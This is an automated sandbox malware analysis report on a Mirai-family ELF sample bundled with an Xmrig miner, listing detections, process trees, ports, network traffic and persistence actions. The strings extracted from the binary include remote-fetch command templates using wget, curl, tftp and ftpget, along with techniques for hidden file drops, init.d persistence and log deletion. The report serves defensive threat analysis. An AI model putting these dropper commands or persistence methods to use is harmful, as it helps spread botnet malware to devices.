Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
morte.m68k.elf

Overview

General Information

Sample name:morte.m68k.elf
Analysis ID:1729418
Has dependencies:false
MD5:fd9877fcd67cda3221f58731bcd32b54
SHA1:3873a5eefc7e1bd4438740bbcabd3b12a8615856
SHA256:c2f553cbe5bf2dd338b6c9d22ed8e8f1687431fa3404c9e7d2b3ddc46f958797
Tags:elfMiraiuser-abuse_ch
Infos:

Detection

Mirai, Xmrig
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Xmrig cryptocurrency miner
Deletes system log files
Drops files in suspicious directories
Drops invisible ELF files
Found strings related to Crypto-Mining
Manipulation of devices in /dev
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1729418
Start date and time:2025-07-06 08:11:55 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:morte.m68k.elf
Detection:MAL
Classification:mal100.troj.evad.mine.linELF@0/3@0/0
  • Connection to analysis system has been lost, crash info: Unknown
Command:/tmp/morte.m68k.elf
PID:5804
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • morte.m68k.elf (PID: 5804, Parent: 5722, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/morte.m68k.elf
    • morte.m68k.elf New Fork (PID: 5806, Parent: 5804)
      • morte.m68k.elf New Fork (PID: 5808, Parent: 5806)
        • sh (PID: 5817, Parent: 5808, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp /tmp/morte.m68k.elf /usr/bin/.sh"
          • sh New Fork (PID: 5822, Parent: 5817)
          • cp (PID: 5822, Parent: 5817, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp /tmp/morte.m68k.elf /usr/bin/.sh
  • fusermount (PID: 5836, Parent: 3147, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • gdbus (PID: 5838, Parent: 5835, MD5: 1deb65de9f7f468799d3bfde20118a9b) Arguments: /usr/bin/gdbus call -e -d org.gnome.SessionManager -o /org/gnome/SessionManager -m org.gnome.SessionManager.IsSessionRunning
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
XMRIGNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.xmrig
SourceRuleDescriptionAuthorStrings
morte.m68k.elfJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    morte.m68k.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      /usr/bin/.shJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        /usr/bin/.shJoeSecurity_Mirai_3Yara detected MiraiJoe Security
          SourceRuleDescriptionAuthorStrings
          5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
              5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
                  Process Memory Space: morte.m68k.elf PID: 5804JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    Click to see the 3 entries
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: morte.m68k.elfAvira: detected
                    Source: /usr/bin/.shAvira: detection malicious, Label: LINUX/Mirai.bonb
                    Source: morte.m68k.elfVirustotal: Detection: 50%Perma Link
                    Source: morte.m68k.elfReversingLabs: Detection: 58%

                    Bitcoin Miner

                    barindex
                    Source: Yara matchFile source: morte.m68k.elf, type: SAMPLE
                    Source: Yara matchFile source: 5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: morte.m68k.elf PID: 5804, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: morte.m68k.elf PID: 5806, type: MEMORYSTR
                    Source: Yara matchFile source: /usr/bin/.sh, type: DROPPED
                    Source: morte.m68k.elf, 5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmpString found in binary or memory: cryptonight
                    Source: morte.m68k.elfString: ^H/run/shm/data/local/tmpabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/var/mnt/root/boot/bin/sbin/home/dev/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/usr/sbin/ps/usr/bin/ps/usr/sbin/passwd/usr/bin/passwd/usr/sbin/rm/usr/bin/rm
                    Source: morte.m68k.elfString: GFHICK"/var/run//mnt//root//var//var/tmp/m68k%s%swget http://%s/%s/%s -O %scurl -o %s http://%s/%s/%stftp %s -c get %s %scd %s && tftp -g -r %s %sftpget -v -u anonymous -p anonymous -P 21 %s %s %s
                    Source: .sh.18.drString: ^H/run/shm/data/local/tmpabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/var/mnt/root/boot/bin/sbin/home/dev/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/usr/sbin/ps/usr/bin/ps/usr/sbin/passwd/usr/bin/passwd/usr/sbin/rm/usr/bin/rm
                    Source: .sh.18.drString: GFHICK"/var/run//mnt//root//var//var/tmp/m68k%s%swget http://%s/%s/%s -O %scurl -o %s http://%s/%s/%stftp %s -c get %s %scd %s && tftp -g -r %s %sftpget -v -u anonymous -p anonymous -P 21 %s %s %s
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:1338Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:1111Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:1213Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:1234Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:333Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:666Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:777Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:9999Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:5656Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:8585Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:6363Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:6969Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:3779Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:3778Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:38273Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:10345Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:23455Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:1991Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:21769Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:42352Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:48101Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:39182Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:47767Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:6667Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:1337Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:4321Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:232Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:24136Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12146Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30062Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12147Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:26733Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:47Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25697Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29793Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12140Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28515Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:24940Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12148Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28016Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:97Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25187Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25701Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:26215Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:26729Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:27243Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:27757Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28271Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28785Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29299Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29813Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30327Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30841Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:31297Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:16963Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:17477Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:17991Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:18505Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:19019Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:19533Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:20047Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:20561Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:21075Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:21589Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:22103Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:22617Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:23088Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12594Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:13108Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:13622Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:14136Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:14592Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12150Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:24946Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28014Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29696Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28527Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12130Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:26990Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29538Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:26735Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28005Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30208Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12132Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25974Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12131Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28526Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29551Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:27749Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30305Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29231Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:27753Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25135Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25711Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25451Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25970Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30067Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25954Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12149Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29554Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25193Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28207Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29544Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30068Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30574Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12144Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28535Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28518Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:26112Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:26721Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:27764Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12151Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:26469Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25461Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29292Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12134Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29808Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29798Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:31074Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28536Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25205Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29561Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25199Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30720Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28261Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29811Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:12142Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:25972Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29556Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:24948Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29440Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:28769Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:29555Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:30564Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)Socket: 0.0.0.0:27904Jump to behavior
                    Source: global trafficTCP traffic: 192.168.2.14:37518 -> 65.222.202.53:80
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.222.202.53
                    Source: Initial sampleString containing 'busybox' found: /usr/sbin/busybox
                    Source: Initial sampleString containing 'busybox' found: /usr/bin/busybox
                    Source: Initial sampleString containing 'busybox' found: ^H/run/shm/data/local/tmpabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/var/mnt/root/boot/bin/sbin/home/dev/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/usr/sbin/ps/usr/bin/ps/usr/sbin/passwd/usr/bin/passwd/usr/sbin/rm/usr/bin/rm
                    Source: ELF static info symbol of initial sample.symtab present: no
                    Source: /tmp/morte.m68k.elf (PID: 5825)SIGKILL sent: pid: 1399, result: successfulJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)SIGKILL sent: pid: 1399, result: no such processJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)SIGKILL sent: pid: 2991, result: successfulJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5825)SIGKILL sent: pid: 3125, result: successfulJump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.mine.linELF@0/3@0/0

                    Data Obfuscation

                    barindex
                    Source: /tmp/morte.m68k.elf (PID: 5829)Deleted: /dev/nullJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5829)Deleted: /dev/kmsgJump to behavior

                    Persistence and Installation Behavior

                    barindex
                    Source: /bin/fusermount (PID: 5836)File: /proc/5836/mountsJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File: /etc/rc2.d/S99sysd -> /etc/init.d/sysdJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File: /etc/init.d/sysd (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                    Source: /usr/bin/cp (PID: 5822)File: /usr/bin/.shJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3760/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/1583/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/2672/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/110/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3759/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/111/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/112/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/113/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/234/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/1577/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/114/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/235/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/115/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/116/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/117/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/118/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/119/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3873/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3757/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/10/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/917/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3758/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/11/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/12/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/13/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/14/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/15/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/16/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/17/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/18/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/19/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/1593/cmdlineJump to behavior
